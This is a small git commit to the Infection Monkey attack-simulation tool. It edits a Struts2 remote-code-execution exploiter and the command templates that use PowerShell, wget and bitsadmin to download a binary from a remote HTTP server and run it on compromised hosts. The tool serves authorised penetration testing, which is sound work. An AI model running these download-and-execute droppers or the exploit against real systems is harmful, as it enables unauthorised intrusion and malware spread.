Small changes

2018-06-26 18:03:31 +03:00 · 2018-06-26 18:03:31 +03:00 · c278b0a29c
parent 6a37f2b953
commit c278b0a29c
2 changed files with 7 additions and 4 deletions
--- a/infection_monkey/exploit/struts2.py
+++ b/infection_monkey/exploit/struts2.py
@ -12,7 +12,8 @@ import logging
 from exploit import HostExploiter
 from exploit.tools import get_target_monkey, get_monkey_depth
 from tools import build_monkey_commandline, HTTPTools
-from model import CHECK_LINUX, CHECK_WINDOWS, POWERSHELL_HTTP, WGET_HTTP, EXISTS, ID_STRING, RDP_CMDLINE_HTTP_BITS_DROPPER
+from model import CHECK_LINUX, CHECK_WINDOWS, POWERSHELL_HTTP, WGET_HTTP, EXISTS, ID_STRING, RDP_CMDLINE_HTTP, \
+                  DROPPER_ARG

 __author__ = "VakarisZ"

@ -71,6 +72,7 @@ class Struts2Exploiter(HostExploiter):
            LOG.info("Host is exploitable with struts2 RCE vulnerability")
            # If monkey already exists and option not to exploit in that case is selected
            if self.skip_exist and self.check_remote_file(url, dropper_path):
+                LOG.info("Host %s was already infected under the current configuration, done" % self.host)
                return True

            src_path = get_target_monkey(self.host)
@ -114,6 +116,7 @@ class Struts2Exploiter(HostExploiter):
            if self.skip_exist:
                for dropper_path in dropper_paths:
                    if self.check_remote_file(url, re.sub(r"\\", r"\\\\", dropper_path)):
+                        LOG.info("Host %s was already infected under the current configuration, done" % self.host)
                        return True

            src_path = get_target_monkey(self.host)
@ -138,8 +141,8 @@ class Struts2Exploiter(HostExploiter):
            command = POWERSHELL_HTTP % {'monkey_path': re.sub(r"\\", r"\\\\", dropper_path),
                                         'http_path': http_path, 'parameters': cmdline}

-            backup_command = RDP_CMDLINE_HTTP_BITS_DROPPER % {'monkey_path': re.sub(r"\\", r"\\\\", dropper_path),
-                                                      'http_path': http_path, 'parameters': cmdline}
+            backup_command = RDP_CMDLINE_HTTP % {'monkey_path': re.sub(r"\\", r"\\\\", dropper_path),
+                                                 'http_path': http_path, 'parameters': cmdline, 'type': DROPPER_ARG}

            resp = self.exploit(url, command)

--- a/infection_monkey/model/init.py
+++ b/infection_monkey/model/init.py
@ -19,7 +19,7 @@ DELAY_DELETE_CMD = 'cmd /c (for /l %%i in (1,0,2) do (ping -n 60 127.0.0.1 & del
 # Commands used for downloading monkeys
 POWERSHELL_HTTP = "powershell -NoLogo -Command \"Invoke-WebRequest -Uri \\\'%%(http_path)s\\\' -OutFile \\\'%%(monkey_path)s\\\' -UseBasicParsing; %%(monkey_path)s %s %%(parameters)s\"" % (DROPPER_ARG, )
 WGET_HTTP = "wget -O %%(monkey_path)s %%(http_path)s && chmod +x %%(monkey_path)s && %%(monkey_path)s %s %%(parameters)s" % (DROPPER_ARG, )
-RDP_CMDLINE_HTTP_BITS_DROPPER = 'bitsadmin /transfer Update /download /priority high %%(http_path)s %%(monkey_path)s&&start /b %%(monkey_path)s %s %%(parameters)s'  % (DROPPER_ARG, )
+RDP_CMDLINE_HTTP = 'bitsadmin /transfer Update /download /priority high %%(http_path)s %%(monkey_path)s&&start /b %%(monkey_path)s %%(type)s %%(parameters)s'

 # Commands used to check for architecture and if machine is exploitable
 CHECK_WINDOWS = "echo %s && wmic os get osarchitecture" % ID_STRING